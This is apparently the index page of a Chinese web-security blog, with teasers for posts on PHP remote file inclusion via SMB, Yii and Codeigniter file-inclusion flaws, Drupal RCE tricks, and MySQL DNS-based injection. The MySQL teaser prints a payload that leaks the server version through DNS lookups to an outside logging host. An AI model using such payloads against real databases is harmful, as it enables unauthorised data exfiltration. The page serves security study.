用SMB绕过php远程文件包含限制的实践测试

前言

看到freebuf上的《RFI绕过URL包含限制Getshell》和先知社区上的《通过SMB造成远程文件包含(双Off情况)》这两篇文章,说是利用SMB协议可以绕过php对远程文件包含的限制。

Mehr lesen

YII框架全版本文件包含漏洞

文章首先发布在先知社区,转载请注明出处。

框架介绍

Yii框架是一个通用的WEB编程框架, 其代码简洁优雅,具有性能高,易于扩展等优点,在国内国内均具有庞大的使用群体。

Mehr lesen

Drupal 1-click to RCE漏洞利用的三个小技巧

Seebug上看到的《Drupal 1-click to RCE 分析》这篇关于Drupal的漏洞分析,感觉很精彩,用到了三个很有意思的技巧点。

Mehr lesen

Confluence 漏洞分析环境搭建

下载方式

https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.9.0.zip

Mehr lesen

Codeigniter始终未完全修复的文件包含漏洞

Codeigniter介绍

Codeigniter是一款非常流行的PHP框架。我也曾经用这个框架开发了不少项目,因为结构简单,没有Laravel等框架那么复杂,在PHP开发圈使用量也比较大。

Mehr lesen

PHP安全漏洞所需条件总结

PHP的漏洞当中,各种利用方式所需要的条件是不一样的。有的需要指定版本,有的需要指定的php.ini条件,做此记录,防止时间久了模糊。

1).截断问题

Mehr lesen

MySQL利用DNS实现注入总结

这个利用方式只能在Windows下利用,而且对mysql的版本也有限制:mysql版本必须小于5.5.53

测试语句:

1
SELECT LOAD_FILE(CONCAT('\\\\',version(),'.a.ceshia.ag5dgy.ceye.io\\abc'))

Mehr lesen

Wazuh邮件报警配置总结

背景

Wazuh 的 OSSEC提供邮件报警功能,配置部分在

1
# vim /var/ossec/etc/ossec.conf

Mehr lesen

格式化字符串引发的安全问题

PHP部分

1).vsprintfsprintf导致的单引号逃逸问题

两个函数都是用来格式化字符串的。

Mehr lesen

PHP框架系统版本收集

判断codeigniter框架和版本

1
grep -GR "define('CI_VERSION', '.*');"  ./

Mehr lesen